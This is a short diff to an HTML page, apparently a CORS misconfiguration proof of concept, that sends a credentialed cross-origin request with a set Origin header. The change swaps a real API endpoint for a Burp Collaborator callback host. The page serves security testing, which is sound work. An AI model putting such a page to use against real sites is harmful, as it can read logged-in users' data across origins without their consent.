--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <script>
 var req = new XMLHttpRequest();
 req.onload = reqListener;
-req.open('GET','https://recurity.europe-west1.talon.farm/v1/applications/1/campaigns?pageSize=3&sort=-updated',true);
+req.open('GET','https://6ahtaw8mw0yqsexyg3fzn7yo6fc90y.burpcollaborator.net',true);
 req.withCredentials = true;
 req.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
 req.setRequestHeader("Origin", "johanrydbergmoller.github.io");
